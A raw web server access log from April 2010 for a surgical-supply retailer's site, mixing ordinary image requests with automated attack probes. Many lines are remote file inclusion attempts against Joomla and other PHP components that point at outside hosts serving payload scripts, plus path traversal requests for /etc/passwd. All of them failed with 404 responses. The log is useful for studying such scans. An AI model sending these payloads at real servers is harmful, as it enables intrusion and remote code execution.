139.168.143.136 - - [16/Apr/2010:00:51:50 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:51 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:51 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:51 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:51 -0400] "GET /logs/error_log.Q110040700%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:52 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:52 -0400] "GET /logs/access_log.Q109120500%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:51:52 -0400] "GET /logs/access_log.Q110010800%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:52 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:52 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:53 -0400] "GET /logs/access_log.Q109071700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:53 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:54 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:54 -0400] "GET /logs/error_log.Q109110100%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:54 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:54 -0400] "GET /logs/error_log.Q109062200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:55 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:55 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:56 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:51:56 -0400] "GET /logs/access_log.Q110040700%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:56 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:57 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:57 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.236.47.182 - - [16/Apr/2010:00:51:57 -0400] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:51:57 -0400] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:51:57 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:51:58 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:58 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:59 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:59 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:59 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:51:59 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4274EC5E94092000780707P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:52:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:52:00 -0400] "GET /logs/access_log.Q109062200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:00 -0400] "GET /logs/error_log.Q109120500%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:00 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:00 -0400] "GET /logs/error_log.Q110022600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:52:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:52:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.98.23.9 - - [16/Apr/2010:00:52:06 -0400] "GET /logs/access_log.Q110012600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:06 -0400] "GET /logs/error_log.Q110010900%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:07 -0400] "GET /logs/error_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:17 -0400] "GET /logs/error_log.Q110012600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:00:52:23 -0400] "GET //include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:00:52:23 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:00:52:23 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:00:52:24 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:00:52:24 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:00:52:24 -0400] "GET /logs/error_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:00:52:24 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:00:52:24 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:00:52:24 -0400] "GET /logs/error_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:27 -0400] "GET /logs/access_log.Q109062900%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:00:52:29 -0400] "GET /logs/access_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:00:52:29 -0400] "GET /logs/access_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:33 -0400] "GET /logs/access_log.Q109082400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:38 -0400] "GET /logs/error_log.Q109082400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:38 -0400] "GET /logs/access_log.Q109051400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:52:38 -0400] "GET /logs/error_log.Q109062900%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
71.145.134.7 - - [16/Apr/2010:00:52:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
71.145.134.7 - - [16/Apr/2010:00:52:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
79.98.23.9 - - [16/Apr/2010:00:52:49 -0400] "GET /logs/error_log.Q109060400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
71.145.134.7 - - [16/Apr/2010:00:52:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
71.145.134.7 - - [16/Apr/2010:00:52:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
79.98.23.9 - - [16/Apr/2010:00:53:05 -0400] "GET /logs/access_log.Q109101100%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:10 -0400] "GET /logs/access_log.Q109060400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:10 -0400] "GET /logs/error_log.Q110012200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:10 -0400] "GET /logs/error_log.Q109051400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:17 -0400] "GET /logs/error_log.Q109120600%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.201.180.130 - - [16/Apr/2010:00:53:21 -0400] "GET /index.php?openfile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "-"
79.174.78.178 - - [16/Apr/2010:00:53:22 -0400] "GET /logs/access_log.Q109120900//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.201.180.130 - - [16/Apr/2010:00:53:22 -0400] "GET /logs/index.php?openfile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "-"
217.23.8.91 - - [16/Apr/2010:00:53:23 -0400] "GET //index2.php?mosConfig_absolute_path=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:00:53:23 -0400] "GET /logs//index2.php?mosConfig_absolute_path=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:00:53:23 -0400] "GET /logs/access_log.Q110030500%20%20//index2.php?mosConfig_absolute_path=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:53:26 -0400] "GET /logs/access_log.Q109090600//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.201.180.130 - - [16/Apr/2010:00:53:26 -0400] "GET /index.php?openfile=./../../../../../../../../etc/passwd HTTP/1.1" 404 207 "-" "-"
79.98.23.9 - - [16/Apr/2010:00:53:26 -0400] "GET /logs/access_log.Q109062700%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:26 -0400] "GET /logs/error_log.Q109101100%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:26 -0400] "GET /logs/access_log.Q109082300%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:26 -0400] "GET /logs/access_log.Q109072600%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:33 -0400] "GET /logs/access_log.Q109091300%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:33 -0400] "GET /logs/access_log.Q109080400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:43 -0400] "GET /logs/access_log.Q109083100%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:43 -0400] "GET /logs/error_log.Q109083100%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:53:44 -0400] "GET //mp3/velid3/module.archive.gzip.php?determined_format[include]=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:53:44 -0400] "GET /logs//mp3/velid3/module.archive.gzip.php?determined_format[include]=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:53:44 -0400] "GET /logs/access_log.Q109081500%20%20//mp3/velid3/module.archive.gzip.php?determined_format[include]=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:53:47 -0400] "GET //mp3/velid3/module.archive.gzip.php?determined_format[include]=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:53:47 -0400] "GET /logs//mp3/velid3/module.archive.gzip.php?determined_format[include]=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:53:47 -0400] "GET /logs/access_log.Q109081500%20%20//mp3/velid3/module.archive.gzip.php?determined_format[include]=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:00:53:47 -0400] "GET /logs/access_log.Q110012800%20%20//include/lib.inc.php?site_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:48 -0400] "GET /logs/error_log.Q109091300%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:49 -0400] "GET /logs/access_log.Q109070500%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:53:49 -0400] "GET /logs/error_log.Q109062700%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.201.180.130 - - [16/Apr/2010:00:53:50 -0400] "GET /logs/index.php?openfile=./../../../../../../../../etc/passwd HTTP/1.1" 404 212 "-" "-"
209.59.12.99 - - [16/Apr/2010:00:53:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.222.152.66 - - [16/Apr/2010:00:54:01 -0400] "GET //index2.php?mosConfig_absolute_path=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:00:54:01 -0400] "GET /logs//index2.php?mosConfig_absolute_path=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:00:54:01 -0400] "GET //index2.php?mosConfig_absolute_path=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:00:54:01 -0400] "GET /logs//index2.php?mosConfig_absolute_path=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
